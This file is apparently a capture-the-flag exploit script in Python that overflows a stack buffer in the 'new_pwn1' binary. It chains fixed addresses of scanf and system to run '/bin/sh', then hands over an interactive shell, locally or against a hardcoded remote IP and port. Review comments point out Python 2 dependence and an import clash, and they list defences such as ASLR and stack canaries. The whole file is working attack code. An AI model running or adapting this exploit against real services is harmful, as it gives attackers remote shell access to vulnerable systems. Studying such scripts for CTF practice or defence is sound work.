exploit.py
from pwn import *
from zio import *
# Proof-of-concept driver for a stack buffer overflow in the `new_pwn1`
# challenge binary (the original author's marker for it is "trigger bof").
#
# NOTE(review): both wildcard imports above share one namespace, so any name
# that pwn and zio both export resolves to the zio one (imported last).
# NOTE(review): the payload is built by adding a str literal to p32() output,
# which only concatenates on Python 2 -- confirm the intended interpreter.

# True  -> run against a local copy of the binary.
# False -> connect to the remote service.
debug = True

# Endpoint handed to zio: an executable path or a (host, port) pair.
target = './new_pwn1' if debug else ('114.55.7.125', 8000)

# Echo the traffic in colour: green for data read, blue for data written.
read_style = COLORED(RAW, "green")
write_style = COLORED(RAW, "blue")
io = zio(target, timeout=9999, print_read=read_style, print_write=write_style)

# Disabled debugger hook, kept from the original for reference:
# if debug:
#     gdb.attach(pidof('pwn1')[-1], open('aa'))

# Absolute 32-bit addresses, presumably taken from one specific build of the
# target -- verify against the binary under test.
pattern_addr = 0x804888f
scanf_addr = 0x80484f0
system_addr = 0x80484b6
global_addr = 0x804a1a0

# NOTE(review): every value above is a fixed address, so the script can only
# match a binary that is loaded at a fixed base. A position-independent build
# with ASLR, stack canaries, and a length-bounded read of the name field are
# the standard defences against this class of overflow.

# 140 filler bytes, then the four packed addresses, padded out to 256 bytes.
filler = 'A' * 140
packed_words = ''.join(
    p32(addr)
    for addr in (scanf_addr, system_addr, pattern_addr, global_addr)
)
shellcode = (filler + packed_words).ljust(256, 'B')

# Answer the name prompt with the oversized input.
io.read_until('input your name:')
io.write(shellcode)

# Answer the next prompt, send the follow-up line, then hand the session to
# the operator.
io.read_until(':')
io.writeline('1')
io.writeline('/bin/sh')
io.interact()